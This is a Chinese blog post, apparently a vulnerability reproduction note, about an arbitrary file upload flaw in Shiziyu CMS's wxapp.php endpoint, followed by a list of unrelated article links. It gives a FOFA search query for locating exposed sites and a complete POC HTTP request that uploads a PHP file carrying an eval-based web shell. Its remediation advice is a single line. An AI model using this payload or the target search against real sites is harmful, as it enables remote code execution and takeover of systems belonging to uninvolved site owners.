当前位置: 首页 > news >正文

【漏洞复现】狮子鱼CMS文件上传漏洞(wxapp.php)

Nx01 产品简介

        狮子鱼CMS(Content Management System)是一种网站管理系统,它旨在帮助用户更轻松地创建和管理网站。该系统拥有用户友好的界面和丰富的功能,包括页面管理、博客、新闻、产品展示等。通过简单直观的管理界面,网站所有者可以方便地进行内容的发布、管理和布局。

Nx02 漏洞描述

        狮子鱼CMS wxapp.php文件存在任意文件上传漏洞,攻击者可能利用这个漏洞上传恶意文件并执行恶意代码。

Nx03 产品主页

fofa-query: body="/seller.php?s=/Public/login"

Nx04 漏洞复现

POC:

POST /wxapp.php?controller=Goods.doPageUpload HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs

------WebKitFormBoundary8UaANmWAgM4BqBSs
Content-Disposition: form-data; name="upfile"; filename="test.php"
Content-Type: http://peiqi-wiki-poc.oss-cn-beijing.aliyuncs.com/vuln/gif

<?php @eval($_POST['test']);?>
------WebKitFormBoundary8UaANmWAgM4BqBSs--

Nx05 修复建议

建议联系软件厂商进行处理。

相关文章:

  • python+flask+django医院预约挂号系统6nrhh
  • 3、安全开发-Python-协议库爆破FTPSSHRedisMYSQLSMTP等
  • 【C语言】三子棋游戏实现代码
  • 浅谈人工智能之深度学习~
  • Redis底层原理
  • 休斯顿NASA太空机器人进入最后测试阶段,或可模拟人类执行外星任务!
  • 鸿蒙(HarmonyOS)项目方舟框架(ArkUI)之AlphabetIndexer组件
  • html5 audio video
  • EasyExcel的导入导出使用
  • 【深度学习每日小知识】全景分割
  • 测试开发体系
  • 专业140+总分410+华南理工大学811信号与系统考研经验华工电子信息与通信,真题,大纲,参考书。
  • Android 识别车牌信息
  • 计算机网络相关题目及答案(第五章)
  • 智慧自助餐饮系统(SpringBoot+MP+Vue+微信小程序+JNI+ncnn+YOLOX-Nano)
  • 边缘计算第二版施巍松——第七章 边缘计算资源调度
  • C#用Array类的FindAll方法和List<T>类的Add方法按关键词在数组中检索元素并输出
  • 分享66个时间日期JS特效,总有一款适合您
  • 使用Pycharm在本地调用chatgpt的接口
  • 论文笔记:相似感知的多模态假新闻检测
  • 西湖大学2025年上海市综合评价招生简章发布
  • “非思”的思想——探索失语者的思想史
  • 十四届全国人大常委会举行第四十四次委员长会议
  • “80后”杨占旭已任辽宁阜新市副市长,曾任辽宁石油化工大学副校长
  • “铁血防守”制造8年最快丢球,恐惧中的阿森纳什么也做不了
  • 上汽集团一季度净利润30.2亿元,同比增长11.4%